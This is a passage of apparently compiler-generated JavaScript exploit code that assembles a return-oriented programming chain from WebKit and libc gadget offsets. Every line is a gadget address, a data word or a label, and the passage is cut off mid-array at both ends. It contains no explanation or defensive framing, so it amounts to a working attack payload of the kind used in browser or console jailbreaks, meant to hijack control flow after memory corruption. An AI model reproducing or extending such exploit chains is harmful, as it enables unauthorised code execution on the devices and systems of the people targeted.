webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+286208, //L5490
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+286176, //L5488
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5488:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5489:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5490:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+286320, //L5491
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+286352, //L5493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+286336, //L5492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5491:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5492:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5493:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5494:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L5495:
db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
//L5435:
libc_base+764760, //pop rsi
ropchain+286616, //L5497
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+286632, //L5498
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+286600, //L5496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5496:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5497:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5498:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+286792, //L5502
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+286760, //L5500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+286776, //L5501
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5499:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5500:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5501:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5502:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+286848, //L5504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5504:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+286976, //L5506
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+286992, //L5507
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+286960, //L5505
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5505:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5506:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5507:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+287088, //L5509
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+287072, //L5508
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5508:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5509:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+287184, //L5511
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L5510:
db([4294967264, 4294967295]); // -0x20
set_gadget(libc_base+759608,); //pop rax
//L5511:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+287264, //L5513
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5513:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+287320, //L5514
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5514:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+287400, //L5516
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5516:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5518:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+287520, //L5521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+287504, //L5519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5519:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5521:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+287664, //L5524
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+287632, //L5522
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+287648, //L5523
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5522:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5523:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5524:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+287752, //L5526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L5525:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L5526:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+287808, //L5527
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5527:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5529:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+287888, //L5531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5531:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+287992, //L5532
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+288008, //L5533
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5532:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5533:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+288096, //L5535
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5535:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+288152, //L5536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5536:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+288224, //L5539
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5539:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+288280, //L5540
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5540:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+288368, //L5542
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5542:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5544:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+288488, //L5547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+288472, //L5545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5545:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5547:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+288632, //L5550
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+288600, //L5548
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+288616, //L5549
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5548:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5549:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5550:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+288712, //L5551
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5551:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5553:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+288832, //L5556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+288816, //L5554
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5554:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5556:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+288944, //L5557
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+288976, //L5559
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+288960, //L5558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5557:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5558:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5559:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+289144, //L5562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+755774, //mov rax, rsi
libc_base+764760, //pop rsi
ropchain+289112, //L5560
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+289128, //L5561
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5560:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5561:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5562:
db([0, 0]); // 0x0
set_gadget(webkit_base+1438842,); //pop rdx
db([0, 0]); // 0x0
set_gadgets([
webkit_base+24132920, //div rsi ; add rax, rcx
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+289224, //L5563
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5563:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5565:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L5567:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+289384, //L5570
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+289368, //L5568
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5568:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5570:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+289544, //L5575
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+289560, //L5576
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+289496, //L5572
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5572:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5573:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L5574:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5575:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5576:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+289672, //L5577+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+289664, //L5577
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5577:
db([0, 0]); // 0x0
set_gadgets([
ropchain+289688, //L5577+24
ropchain+290640, //L5571
libc_base+764760, //pop rsi
ropchain+289728, //L5578
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5578:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5580:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+289848, //L5583
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+289832, //L5581
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5581:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5583:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+289992, //L5586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+289960, //L5584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+289976, //L5585
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5584:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5585:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5586:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+290088, //L5588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5587:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5588:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5589:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+290192, //L5590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+290208, //L5591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5590:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5591:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+290384, //L5593
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+290400, //L5594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+290368, //L5592
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5592:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5593:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5594:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+290544, //L5597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+290560, //L5598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+290512, //L5595
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5595:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5596:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L5597:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5598:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+290632, //L5599
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5599:
db([0, 0]); // 0x0
//L5571:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+290760, //L5602
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+290776, //L5603
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+290744, //L5601
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5601:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5602:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5603:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+290888, //L5605
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+290936, //L5608
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+290904, //L5606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5605:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5606:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5607:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5608:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+291048, //L5609+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+291040, //L5609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5609:
db([0, 0]); // 0x0
set_gadgets([
ropchain+291064, //L5609+24
ropchain+291080, //L5604
libc_base+782311, //pop rsp
ropchain+279792, //L5328
//L5604:
//L5610:
//L5322:
libc_base+764760, //pop rsi
ropchain+291120, //L5611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5611:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5613:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+291240, //L5616
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+291224, //L5614
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5614:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5616:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+291416, //L5619
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+291432, //L5620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+291384, //L5617
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+291400, //L5618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5617:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5618:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5619:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5620:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+291528, //L5622
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+291512, //L5621
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5621:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5622:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+291608, //L5623
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5623:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5625:
db([80, 0]); // 0x50
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+291728, //L5628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+291712, //L5626
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5626:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5628:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+291904, //L5631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+291920, //L5632
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+291872, //L5629
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+291888, //L5630
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5629:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5630:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5631:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5632:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+292016, //L5634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+292000, //L5633
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5633:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5634:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+292096, //L5635
